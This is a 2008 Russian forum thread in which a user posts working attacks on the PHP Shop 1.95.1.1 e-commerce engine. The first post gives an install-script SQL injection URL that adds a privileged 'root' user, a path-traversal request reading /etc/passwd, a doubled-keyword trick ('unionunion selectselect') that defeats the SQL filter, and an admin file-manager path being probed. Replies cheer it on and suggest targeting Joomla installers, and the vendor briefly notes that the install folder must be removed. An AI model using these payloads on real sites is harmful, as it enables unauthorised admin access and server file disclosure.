PHP Shop 1.95.1.1 и его дыры

Тема в разделе "Интернет-магазины", создана пользователем petvv, 5 ноя 2008.

Статус темы:
Закрыта.
  1. petvv

    petvv Создатель

    Регистр.:
    7 авг 2007
    Сообщения:
    24
    Симпатии:
    2
    Нарыл вот статью про этот движок, правда она относится к 1.80, но всё же решил проверить на 1.95.1.1 и вот, что получается:

    хттп://хост.ru/install/install.php?install=2&CsvContent=INSERT%20INTO%20phpshop_phpshop_users%20VALUES%20(666,0,0x726f6f74,0x636d397664413d3d,0x726f6f74,1);0a2
    и имеем добавление нового пользователя с соответствующими правами.

    идём далее

    хттп://хост.ru/install/update/install.php?SysValue[file][error]=../../../etc/passwd
    конечно на локалке вы получите матангу в виде ошибки, а на реальном сервере :D

    далее юзаем приложенную форму (править на свой хост) :D :

    смотрим и удивляемся, какой кривой движок однако, из-за registerglogal==On

    а вообщев этом файле, т.к. отсутствует рекурсивная проверка на инструкции, а стоит однократная проверка Тьюринга, то вообще можно извращаться над БД как угодно:

    unionunion selectselect 1,2,3,4 from phpshop_(ну или другой префикс базы)name

    Пока это усё, проверяю описанный

    phpshop/admpanel/editor2/editor/filemanager/browser/defolt/connectors/php/connector.php

    далее по результатам отпишусь, но сегодня тяжко, после бани с :az: тяжко

    Жду ваши мнения, предложения, пожелания
     

    Вложения:

  2. sergyboiko

    sergyboiko Создатель

    Регистр.:
    17 июн 2008
    Сообщения:
    18
    Симпатии:
    1
    Весьма познавательно. Надо бы на инсталляторе джумлы поиздеваться. Из пожеланий хочу добавить - ПИШИ исчо :)
     
  3. PHPShop

    PHPShop Создатель

    Регистр.:
    18 май 2007
    Сообщения:
    25
    Симпатии:
    6
    Магазин не может работать с инсталлятором на UNIX, есть проверка па папку install ее нужно удалять.
    Если скрипт видит, что запущен на винде, то удалять не просит, но смысл инклюдить у себя на денвере?:smmne:
     
Статус темы:
Закрыта.